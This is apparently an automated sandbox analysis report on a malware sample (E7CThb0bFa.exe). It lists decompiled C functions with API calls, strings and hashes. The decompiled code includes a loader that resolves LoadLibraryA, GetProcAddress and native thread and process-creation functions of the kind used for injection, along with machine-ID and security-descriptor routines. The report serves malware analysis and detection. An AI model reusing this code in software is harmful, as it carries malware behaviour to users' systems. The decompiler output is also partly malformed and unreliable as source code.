Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 0ad7180b5e61c09a262b7f13a32aae868c43ed68dbb425217af6daec0209aa93
Instruction ID: 0a9a17e66bc868be51a415f8514c2a7eb316ebfaa63ce7add6bff58da6a54ffd
Opcode Fuzzy Hash: 0ad7180b5e61c09a262b7f13a32aae868c43ed68dbb425217af6daec0209aa93
Instruction Fuzzy Hash: 4B217478A042089BDB00EF65C992AAE77E8EF48704F5144BBF905F73D2D6789E40C769

Uniqueness

Uniqueness Score: -1.00%

Function 004207C8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E004207C8(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = E0040343C(1);
				_push(_t77);
				_push(0x42084f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0x41220c; // 0x412258
				 *((intOrPtr*)(_v12 + 0x6c)) = E00403628(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x47b8c4);
				L0040628C();
				_push(_t77);
				_push(0x4208af);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				E0041F334( *((intOrPtr*)(_v8 + 0x28)));
				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				E0041F330(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x4208b6);
				_push(0x47b8c4);
				L004063B4();
				return 0;
			}

0x004207c9
0x004207cb
0x004207d5
0x004207e4
0x004207e9
0x004207ea
0x004207ef
0x004207f2
0x004207f8
0x004207fe
0x00420811
0x00420811
0x00420819
0x00420823
0x0042082e
0x0042082e
0x00420834
0x00420842
0x00420847
0x0042084a
0x00420866
0x0042086b
0x00420872
0x00420873
0x00420878
0x0042087b
0x00420884
0x0042088f
0x00420892
0x00420899
0x0042089c
0x0042089f
0x004208a4
0x004208a9
0x004208ae

APIs

RtlEnterCriticalSection.NTDLL(0047B8C4), ref: 0042086B
RtlLeaveCriticalSection.NTDLL(0047B8C4), ref: 004208A9

Strings

X"A, xrefs: 00420834

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave
String ID: X"A
API String ID: 3168844106-998740284
Opcode ID: 253a5e7cfa9bd28033097d92a4b28887585d928b86f222e65915daaf4546925d
Instruction ID: e3c3f36d82982d4dc2145e2a7e6e4238d5da50ea5897386ba35e1dfaf6e2df1b
Opcode Fuzzy Hash: 253a5e7cfa9bd28033097d92a4b28887585d928b86f222e65915daaf4546925d
Instruction Fuzzy Hash: DA217F74A04304AFC701EF69D88198EBBF5FF48720B5281BAE804A7352C774AD81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0042C2D8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042C2D8(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E00413EC4( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E00413E68(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E0042B8F8(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}

0x0042c2e1
0x0042c2ee
0x0042c301
0x0042c305
0x0042c355
0x0042c355
0x0042c307
0x0042c307
0x0042c307
0x0042c311
0x0042c317
0x00000000
0x0042c31f
0x0042c324
0x0042c338
0x0042c34f
0x00000000
0x00000000
0x0042c34f
0x00000000
0x0042c351
0x0042c351
0x00000000
0x0042c307
0x0042c359
0x0042c362

APIs

IntersectRect.USER32(?,?,?), ref: 0042C338
EqualRect.USER32(?,?), ref: 0042C348

Strings

@, xrefs: 0042C319

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Rect$EqualIntersect
String ID: @
API String ID: 3291753422-2766056989
Opcode ID: 8e4db0e75e6584b9dc2388094bee1c1f11cf8faa7336afb6c4c5463d8596711e
Instruction ID: bca7c5cf07cbe38fc2b05b59d1374a630d25d2c9a517fbf54e06570ee55165ec
Opcode Fuzzy Hash: 8e4db0e75e6584b9dc2388094bee1c1f11cf8faa7336afb6c4c5463d8596711e
Instruction Fuzzy Hash: 20119E32A042585BCB01DA6DC884BDEBBE89F49398F484692FC04EB382D779ED0587D4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: E7CThb0bFa.exe PID: 7048 Parent PID: 6988 E7CThb0bFa.exeCOMMON

Executed Functions

Function 0041C5F3, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 227
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041C5F3(signed char __ecx, void* __edx) {
				char _v487;
				char _v764;
				char _v772;
				char _v784;
				intOrPtr _v792;
				intOrPtr _v796;
				signed char _v800;
				intOrPtr _v804;
				signed char _v808;
				struct HINSTANCE__* _v812;
				intOrPtr _v816;
				void* __edi;
				void* __esi;
				signed int _t43;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t50;
				_Unknown_base(*)()* _t56;
				void* _t57;
				signed int _t60;
				void** _t61;
				signed int _t65;
				signed int _t67;
				signed int _t68;
				signed int _t70;
				void* _t76;
				intOrPtr _t80;
				signed int _t81;
				signed int _t82;
				signed int _t83;
				struct HINSTANCE__* _t84;
				int _t86;
				signed int _t89;
				void* _t92;
				signed int* _t94;
				WCHAR* _t98;
				void* _t99;
				signed int* _t101;

				_t92 = __edx;
				_t90 = __ecx;
				_v808 = __ecx;
				_t86 = 0;
				_t2 =  &_v808;
				 *_t2 = _v808 & 0x00000001;
				_v800 = __ecx;
				if( *_t2 == 0) {
					 *0x423b60 = 0;
				}
				_t94 = E0041C2AE();
				 *0x423b78 = _t94;
				if(_t94 == _t86) {
					L26:
					_t43 = 0;
				} else {
					if(_v808 != _t86) {
						_v796 = E0041C1E8(_t90, _t92, _t94, "GetProcAddress");
						_v804 = E0041C1E8(_t90, _t92, _t94, "LoadLibraryA");
						_t46 =  *0x423b74;
						_v812 = _t46;
						_t90 =  *((intOrPtr*)(_t46 + 0x3c)) + _t46 + 0x80;
						__eflags = _v804 - _t86;
						if(_v804 == _t86) {
							goto L20;
						} else {
							__eflags = _v792 - _t86;
							if(_v792 == _t86) {
								goto L20;
							} else {
								_t94 =  *_t90;
								__eflags = _t94 - _t86;
								if(_t94 <= _t86) {
									goto L20;
								} else {
									__eflags =  *((intOrPtr*)(_t90 + 4)) - 0x14;
									if( *((intOrPtr*)(_t90 + 4)) <= 0x14) {
										goto L20;
									} else {
										_t94 = _t94 + _t46;
										__eflags =  *_t94 - _t86;
										if( *_t94 == _t86) {
											goto L20;
										} else {
											while(1) {
												_t80 = _v796(_t94[3] + _v804);
												_v792 = _t80;
												__eflags = _t80 - _t86;
												if(_t80 == _t86) {
													goto L26;
												}
												_t101 =  *_t94 + _v808;
												_t89 = _t94[4] + _v808;
												while(1) {
													_t81 =  *_t101;
													__eflags = _t81;
													if(__eflags == 0) {
														break;
													}
													if(__eflags >= 0) {
														_t90 = _v808;
														_t82 = _t81 + _v808 + 2;
													} else {
														_t82 = _t81 & 0x0000ffff;
													}
													_t83 = _v796(_v792, _t82);
													__eflags = _t83;
													if(_t83 == 0) {
														goto L26;
													} else {
														 *_t89 = _t83;
														_t101 =  &(_t101[1]);
														_t89 = _t89 + 4;
														__eflags = _t89;
														continue;
													}
													goto L46;
												}
												_t94 =  &(_t94[5]);
												_t86 = 0;
												__eflags =  *_t94;
												if( *_t94 != 0) {
													continue;
												} else {
													goto L20;
												}
												goto L46;
											}
											goto L26;
										}
									}
								}
							}
						}
					} else {
						_t84 = GetModuleHandleW(_t86);
						 *0x423b74 = _t84;
						if(_t84 == _t86) {
							goto L26;
						} else {
							L20:
							_t98 =  &_v784;
							E00419897(0xe5, _t98);
							_t50 = GetModuleHandleW(_t98);
							 *0x423b7c = _t50;
							if(_t50 == _t86) {
								goto L26;
							} else {
								_t99 = GetProcAddress;
								 *0x423b80 = GetProcAddress(_t50, "NtCreateThread");
								 *0x423b84 = GetProcAddress( *0x423b7c, "NtCreateUserProcess");
								 *0x423b88 = GetProcAddress( *0x423b7c, "NtQueryInformationProcess");
								 *0x423b8c = GetProcAddress( *0x423b7c, "RtlUserThreadStart");
								 *0x423b90 = GetProcAddress( *0x423b7c, "LdrLoadDll");
								_t56 = GetProcAddress( *0x423b7c, "LdrGetDllHandle");
								 *0x423b94 = _t56;
								if( *0x423b80 != _t86 ||  *0x423b84 != _t86) {
									if( *0x423b88 == _t86 ||  *0x423b90 == _t86 || _t56 == _t86) {
										goto L26;
									} else {
										_t57 = HeapCreate(_t86, 0x80000, _t86); // executed
										 *0x423a1c = _t57;
										__eflags = _t57 - _t86;
										if(_t57 != _t86) {
											 *0x422833 = 1;
										} else {
											 *0x423a1c = GetProcessHeap();
											 *0x422833 = 0;
										}
										 *0x423050 = _t86;
										 *0x422832 = 0;
										InitializeCriticalSection(0x422b2c);
										 *0x422b44 = _t86; // executed
										__imp__#115(0x202,  &_v764); // executed
										_t60 = E0041C2E8(_v808, _t90, _t94, _t99);
										__eflags = _t60;
										if(_t60 == 0) {
											goto L26;
										} else {
											__eflags = _v816 - _t86;
											if(_v816 != _t86) {
												L33:
												_t61 = E00413315(_t90, 0xffffffff, 0x423b70);
												 *0x423b64 = _t61;
												__eflags = _t61 - _t86;
												if(_t61 == _t86) {
													goto L26;
												} else {
													 *0x423b68 = GetLengthSid( *_t61);
													 *0x423b6c = E004130AD( *( *0x423b64), _t62);
													_t65 = E0041C367(_t64, _v816);
													__eflags = _t65;
													if(_t65 == 0) {
														goto L26;
													} else {
														 *0x423dd0 = GetCurrentProcessId();
														 *0x423dd4 = _t86;
														__eflags = _v816 - _t86;
														if(_v816 != _t86) {
															_t67 = 1;
														} else {
															_t67 = E0041C3C9();
														}
														__eflags = _t67;
														if(_t67 == 0) {
															goto L26;
														} else {
															__eflags = _v816 - _t86;
															if(_v816 == _t86) {
																E0041CCD2( &_v772);
																_t90 = 0x423fce;
																E0041635B(0x423fce, 0x423dd8,  *0x423b6c,  &_v487, _t86);
															}
															_t68 = E0041C41B(_v808);
															__eflags = _t68;
															if(_t68 == 0) {
																goto L26;
															} else {
																__eflags = _v808 & 0x00000002;
																 *0x423a2c = _t86;
																 *0x4223a8 = 0;
																 *0x4228b0 = 0;
																 *0x422bc8 = 0;
																 *0x422b60 = 0;
																 *0x422848 = 0;
																 *0x4227d0 = 0;
																if(__eflags == 0) {
																	_t70 = 1;
																} else {
																	_t70 = E0041C4D2(_t90, _t92, __eflags);
																}
																__eflags = _t70;
																_t41 = _t70 != 0;
																__eflags = _t41;
																_t43 = _t70 & 0xffffff00 | _t41;
															}
														}
													}
												}
											} else {
												_t76 = CreateEventW(0x423b98, 1, _t86, _t86);
												 *0x424028 =  *0x424028 | 0xffffffff;
												 *0x424024 = _t76;
												__eflags = _t76 - _t86;
												if(_t76 == _t86) {
													goto L26;
												} else {
													goto L33;
												}
											}
										}
									}
								} else {
									goto L26;
								}
							}
						}
					}
				}
				L46:
				return _t43;
			}

0x0041c5f3
0x0041c5f3
0x0041c600
0x0041c605
0x0041c607
0x0041c607
0x0041c60d
0x0041c611
0x0041c613
0x0041c613
0x0041c61e
0x0041c620
0x0041c628
0x0041c7af
0x0041c7af
0x0041c62e
0x0041c632
0x0041c65c
0x0041c665
0x0041c669
0x0041c671
0x0041c675
0x0041c67c
0x0041c680
0x00000000
0x0041c682
0x0041c682
0x0041c686
0x00000000
0x0041c688
0x0041c688
0x0041c68a
0x0041c68c
0x00000000
0x0041c68e
0x0041c68e
0x0041c692
0x00000000
0x0041c694
0x0041c694
0x0041c696
0x0041c698
0x00000000
0x0041c69a
0x0041c69a
0x0041c6a2
0x0041c6a6
0x0041c6aa
0x0041c6ac
0x00000000
0x00000000
0x0041c6b7
0x0041c6bb
0x0041c6eb
0x0041c6eb
0x0041c6ed
0x0041c6ef
0x00000000
0x00000000
0x0041c6c1
0x0041c6ca
0x0041c6ce
0x0041c6c3
0x0041c6c3
0x0041c6c3
0x0041c6d7
0x0041c6db
0x0041c6dd
0x00000000
0x0041c6e3
0x0041c6e3
0x0041c6e5
0x0041c6e8
0x0041c6e8
0x00000000
0x0041c6e8
0x00000000
0x0041c6dd
0x0041c6f1
0x0041c6f4
0x0041c6f6
0x0041c6f8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c6f8
0x00000000
0x0041c69a
0x0041c698
0x0041c692
0x0041c68c
0x0041c686
0x0041c634
0x0041c635
0x0041c63b
0x0041c642
0x00000000
0x0041c648
0x0041c6fa
0x0041c6fa
0x0041c703
0x0041c70b
0x0041c711
0x0041c718
0x00000000
0x0041c71e
0x0041c71e
0x0041c737
0x0041c749
0x0041c75b
0x0041c76d
0x0041c77f
0x0041c784
0x0041c786
0x0041c791
0x0041c7a1
0x00000000
0x0041c7b6
0x0041c7bd
0x0041c7c3
0x0041c7c8
0x0041c7ca
0x0041c7e0
0x0041c7cc
0x0041c7d2
0x0041c7d7
0x0041c7d7
0x0041c7ec
0x0041c7f2
0x0041c7f9
0x0041c809
0x0041c80f
0x0041c819
0x0041c81e
0x0041c820
0x00000000
0x0041c822
0x0041c822
0x0041c826
0x0041c84b
0x0041c852
0x0041c857
0x0041c85c
0x0041c85e
0x00000000
0x0041c864
0x0041c86c
0x0041c882
0x0041c887
0x0041c88c
0x0041c88e
0x00000000
0x0041c894
0x0041c89a
0x0041c89f
0x0041c8a5
0x0041c8a9
0x0041c8b2
0x0041c8ab
0x0041c8ab
0x0041c8ab
0x0041c8b4
0x0041c8b6
0x00000000
0x0041c8bc
0x0041c8bc
0x0041c8c0
0x0041c8c6
0x0041c8da
0x0041c8e9
0x0041c8e9
0x0041c8f2
0x0041c8f7
0x0041c8f9
0x00000000
0x0041c8ff
0x0041c901
0x0041c906
0x0041c90c
0x0041c912
0x0041c918
0x0041c91e
0x0041c924
0x0041c92a
0x0041c930
0x0041c939
0x0041c932
0x0041c932
0x0041c932
0x0041c93b
0x0041c93d
0x0041c93d
0x0041c93d
0x0041c93d
0x0041c8f9
0x0041c8b6
0x0041c88e
0x0041c828
0x0041c831
0x0041c837
0x0041c83e
0x0041c843
0x0041c845
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c845
0x0041c826
0x0041c820
0x00000000
0x00000000
0x00000000
0x0041c791
0x0041c718
0x0041c642
0x0041c632
0x0041c940
0x0041c946

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0041C635
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress), ref: 0041C70B
GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 0041C72A
GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 0041C73C
GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 0041C74E
GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0041C760
GetProcAddress.KERNEL32(LdrLoadDll), ref: 0041C772
GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0041C784
HeapCreate.KERNELBASE(00000000,00080000,00000000), ref: 0041C7BD
GetProcessHeap.KERNEL32 ref: 0041C7CC
InitializeCriticalSection.KERNEL32(00422B2C), ref: 0041C7F9
WSAStartup.WS2_32(00000202,?), ref: 0041C80F
CreateEventW.KERNEL32(00423B98,00000001,00000000,00000000), ref: 0041C831
GetLengthSid.ADVAPI32(00000000,000000FF,00423B70), ref: 0041C866
GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 0041C894

Strings

NtQueryInformationProcess, xrefs: 0041C73E
GetProcAddress, xrefs: 0041C64D
LdrGetDllHandle, xrefs: 0041C774
NtCreateUserProcess, xrefs: 0041C72C
LdrLoadDll, xrefs: 0041C762
LoadLibraryA, xrefs: 0041C657
RtlUserThreadStart, xrefs: 0041C750
NtCreateThread, xrefs: 0041C724

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$CreateHandleHeapModuleProcess$CriticalCurrentEventInitializeLengthSectionStartup
String ID: GetProcAddress$LdrGetDllHandle$LdrLoadDll$LoadLibraryA$NtCreateThread$NtCreateUserProcess$NtQueryInformationProcess$RtlUserThreadStart
API String ID: 3091071419-305303173
Opcode ID: 2133b51c0e235ce9ba1cea9ed9d74ccb17859e0197277fa5d81991d81922fa61
Instruction ID: b2c51796385fbf768e9b44b559e88ae0f7ed46b93aafba8307846001f4aa9396
Opcode Fuzzy Hash: 2133b51c0e235ce9ba1cea9ed9d74ccb17859e0197277fa5d81991d81922fa61
Instruction Fuzzy Hash: 1E918CB5A40342DFCB20AF64DDC569A7BB0BB44306B54053FE555A32A2D77C9982CF0E

Uniqueness

Uniqueness Score: -1.00%

Function 004152ED, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004152ED(struct _SECURITY_DESCRIPTOR* __edi, intOrPtr* __esi) {
				signed int _v8;
				struct _ACL* _v12;
				int _v16;
				int _v20;
				void** _t19;
				struct _SECURITY_DESCRIPTOR* _t28;
				intOrPtr* _t29;

				_t29 = __esi;
				_t28 = __edi;
				if(InitializeSecurityDescriptor(__edi, 1) == 0 || SetSecurityDescriptorDacl(__edi, 1, 0, 0) == 0) {
					return 0;
				} else {
					_t19 =  &_v8;
					__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;;NRNWNX;;;LW)", 1, _t19, 0); // executed
					if(_t19 == 0) {
						L6:
						_v8 = _v8 | 0xffffffff;
						L7:
						if(_t29 != 0) {
							 *_t29 = 0xc;
							 *(_t29 + 4) = _t28;
							 *((intOrPtr*)(_t29 + 8)) = 0;
						}
						return _v8;
					}
					_v12 = 0;
					if(GetSecurityDescriptorSacl(_v8,  &_v20,  &_v12,  &_v16) == 0 || SetSecurityDescriptorSacl(__edi, _v20, _v12, _v16) == 0) {
						LocalFree(_v8);
						goto L6;
					} else {
						goto L7;
					}
				}
			}

0x004152ed
0x004152ed
0x004152ff
0x00000000
0x00415312
0x00415313
0x0041531e
0x00415326
0x00415361
0x00415361
0x00415365
0x00415367
0x00415369
0x0041536f
0x00415372
0x00415372
0x00000000
0x00415375
0x00415337
0x00415342
0x0041535b
0x00000000
0x00000000
0x00000000
0x00000000
0x00415342

APIs

InitializeSecurityDescriptor.ADVAPI32(00423BA4,00000001,?,0041C81E), ref: 004152F7
SetSecurityDescriptorDacl.ADVAPI32(00423BA4,00000001,00000000,00000000), ref: 00415308
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0041531E
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,00000001,?), ref: 0041533A
SetSecurityDescriptorSacl.ADVAPI32(00423BA4,?,00000001,?), ref: 0041534E
LocalFree.KERNEL32(00000000), ref: 0041535B

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 00415319

Memory Dump Source

Source File: 00000001.00000002.636942963.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.636962090.0000000000425000.00000040.00000001.sdmp Download File

Similarity

API ID: DescriptorSecurity$Sacl$ConvertDaclFreeInitializeLocalString
String ID: S:(ML;;NRNWNX;;;LW)
API String ID: 2050860296-820036962
Opcode ID: 50ea11f7b0f2eb67e295a6826d1274c58b1950548990b716017c72a80dbe77a4
Instruction ID: ab8ad52deedd3dd804a975406fb568378eaf73b5c7d40656954889c165e151e7
Opcode Fuzzy Hash: 50ea11f7b0f2eb67e295a6826d1274c58b1950548990b716017c72a80dbe77a4
Instruction Fuzzy Hash: C8112471A0060DFFDB219F95CD85AEFBBBCEB44740F14406AF561E21A0D7B59A809B14

Uniqueness

Uniqueness Score: -1.00%

Function 004162A5, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E004162A5() {
				void* _t30;
				void* _t33;
				intOrPtr* _t35;
				void* _t36;
				void* _t39;
				void* _t41;

				_t39 = _t41 - 0x74;
				_t17 = _t39 - 0x260;
				 *((char*)(_t39 + 0x73)) = 0;
				__imp__SHGetFolderPathW(0, 0x24, 0, 0, _t17, _t33, _t36, _t30); // executed
				if(_t17 != 0) {
					L8:
					E00411DB1(_t17,  *((intOrPtr*)(_t39 + 0x7c)), 0, 0x10);
				} else {
					PathAddBackslashW(_t39 - 0x260);
					_t35 = __imp__GetVolumeNameForVolumeMountPointW;
					while(1) {
						_t17 =  *_t35(_t39 - 0x260, _t39 - 0x58, 0x64); // executed
						if(_t17 != 0) {
							break;
						}
						PathRemoveBackslashW(_t39 - 0x260);
						if(PathRemoveFileSpecW(_t39 - 0x260) == 0) {
							goto L8;
						} else {
							PathAddBackslashW(_t39 - 0x260);
							continue;
						}
						goto L9;
					}
					if( *((short*)(_t39 - 0x44)) != 0x7b) {
						goto L8;
					} else {
						 *((short*)(_t39 + 8)) = 0;
						_t17 = _t39 - 0x44;
						__imp__CLSIDFromString(_t17,  *((intOrPtr*)(_t39 + 0x7c)));
						if(_t17 != 0) {
							goto L8;
						} else {
							 *((char*)(_t39 + 0x73)) = 1;
						}
					}
				}
				L9:
				return  *((intOrPtr*)(_t39 + 0x73));
			}

0x004162a6
0x004162b5
0x004162c1
0x004162c4
0x004162cc
0x00416343
0x00416349
0x004162ce
0x004162db
0x004162dd
0x0041630c
0x00416319
0x0041631d
0x00000000
0x00000000
0x004162ec
0x00416301
0x00000000
0x00416303
0x0041630a
0x00000000
0x0041630a
0x00000000
0x00416301
0x00416324
0x00000000
0x00416326
0x0041632b
0x0041632f
0x00416333
0x0041633b
0x00000000
0x0041633d
0x0041633d
0x0041633d
0x0041633b
0x00416324
0x0041634e
0x00416358

APIs

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,00000000,0001FD30,?), ref: 004162C4
PathAddBackslashW.SHLWAPI(?), ref: 004162DB
PathRemoveBackslashW.SHLWAPI(?), ref: 004162EC
PathRemoveFileSpecW.SHLWAPI(?), ref: 004162F9
PathAddBackslashW.SHLWAPI(?), ref: 0041630A
GetVolumeNameForVolumeMountPointW.KERNELBASE(?,?,00000064), ref: 00416319
CLSIDFromString.OLE32(?,?), ref: 00416333

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Path$Backslash$RemoveVolume$FileFolderFromMountNamePointSpecString
String ID:
API String ID: 613918483-0
Opcode ID: 3fb2763d953c3988d6f567b61eefd9735e28ef89b272e4f54adc5570e0da5ac7
Instruction ID: 2970f5f9581fa5cf9920b659afc982de0069e5886193073a68f92ad54e635baa
Opcode Fuzzy Hash: 3fb2763d953c3988d6f567b61eefd9735e28ef89b272e4f54adc5570e0da5ac7
Instruction Fuzzy Hash: CF11547190820CAADF209BB1DD88EDF77FCAB04344F140476FD15E3160E679DA889B68

Uniqueness

Uniqueness Score: -1.00%

Function 0041D522, Relevance: 9.1, APIs: 6, Instructions: 83
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(void* __edx, void* __eflags, void* __fp0) {
				char _v5;
				int _v12;
				char _v16;
				char _v20;
				void* _t22;
				void* _t28;
				char _t29;
				char _t33;
				signed int _t36;
				void* _t51;

				_t51 = __fp0;
				_t34 = 0;
				_t33 = 0; // executed
				_t22 = E0041C5F3(0, __edx); // executed
				if(_t22 == 0) {
					L24:
					__eflags = _t33;
					_t21 = _t33 == 0;
					__eflags = _t21;
					ExitProcess(0 | _t21);
				}
				_v20 = 0;
				_v16 = 1;
				_v5 = 0;
				SetErrorMode(0x8007);
				_t28 = CommandLineToArgvW(GetCommandLineW(),  &_v12);
				if(_t28 == 0) {
					L19:
					_t29 = E0041D21C(_t34, __eflags, _t51, _v20, _v16);
					L20:
					_t33 = _t29;
					L21:
					if(_t33 == 0 || ( *0x423b60 & 0x00000002) == 0) {
						goto L24;
					} else {
						Sleep(0xffffffff);
						return _t29;
					}
				}
				_t36 = 0;
				if(_v12 <= 0) {
					L14:
					LocalFree(_t28);
					_t48 = _t33;
					if(_t33 == 0) {
						__eflags = _v5;
						if(__eflags == 0) {
							goto L19;
						}
						E0040BC0D(_t36);
						_t29 = E00406E28();
						__eflags =  *0x423b60 & 0x00000004;
						_t33 = _t29;
						if(( *0x423b60 & 0x00000004) != 0) {
							_t29 = E0040BA86(0x422918, 0);
						}
						goto L21;
					}
					_t29 = E0041D030(_t48);
					goto L20;
				} else {
					goto L3;
				}
				do {
					L3:
					_t34 =  *(_t28 + _t36 * 4);
					if(_t34 != 0 &&  *_t34 == 0x2d) {
						_t34 =  *(_t34 + 2) & 0x0000ffff;
						if(_t34 == 0x66) {
							_v20 = 1;
						} else {
							if(_t34 == 0x69) {
								_t33 = 1;
							} else {
								if(_t34 == 0x6e) {
									_v16 = 0;
								} else {
									if(_t34 == 0x76) {
										_v5 = 1;
									}
								}
							}
						}
					}
					_t36 = _t36 + 1;
				} while (_t36 < _v12);
				goto L14;
			}

0x0041d522
0x0041d529
0x0041d52b
0x0041d52d
0x0041d534
0x0041d60e
0x0041d610
0x0041d612
0x0041d612
0x0041d616
0x0041d616
0x0041d53f
0x0041d542
0x0041d546
0x0041d549
0x0041d55a
0x0041d562
0x0041d5e9
0x0041d5ef
0x0041d5f4
0x0041d5f4
0x0041d5f6
0x0041d5f8
0x00000000
0x0041d603
0x0041d605
0x0041d60d
0x0041d60d
0x0041d5f8
0x0041d568
0x0041d56d
0x0041d5ae
0x0041d5af
0x0041d5b5
0x0041d5b7
0x0041d5c0
0x0041d5c4
0x00000000
0x00000000
0x0041d5c6
0x0041d5cb
0x0041d5d0
0x0041d5d7
0x0041d5d9
0x0041d5e2
0x0041d5e2
0x00000000
0x0041d5d9
0x0041d5b9
0x00000000
0x00000000
0x00000000
0x00000000
0x0041d56f
0x0041d56f
0x0041d56f
0x0041d574
0x0041d57c
0x0041d583
0x0041d5a4
0x0041d585
0x0041d588
0x0041d5a0
0x0041d58a
0x0041d58d
0x0041d59a
0x0041d58f
0x0041d592
0x0041d594
0x0041d594
0x0041d592
0x0041d58d
0x0041d588
0x0041d583
0x0041d5a8
0x0041d5a9
0x00000000

APIs

Part of subcall function 0041C5F3: GetModuleHandleW.KERNEL32(00000000), ref: 0041C635
Part of subcall function 0041C5F3: GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress), ref: 0041C70B
Part of subcall function 0041C5F3: GetProcAddress.KERNEL32(00000000,NtCreateThread), ref: 0041C72A
Part of subcall function 0041C5F3: GetProcAddress.KERNEL32(NtCreateUserProcess), ref: 0041C73C
Part of subcall function 0041C5F3: GetProcAddress.KERNEL32(NtQueryInformationProcess), ref: 0041C74E
Part of subcall function 0041C5F3: GetProcAddress.KERNEL32(RtlUserThreadStart), ref: 0041C760
Part of subcall function 0041C5F3: GetProcAddress.KERNEL32(LdrLoadDll), ref: 0041C772
Part of subcall function 0041C5F3: GetProcAddress.KERNEL32(LdrGetDllHandle), ref: 0041C784
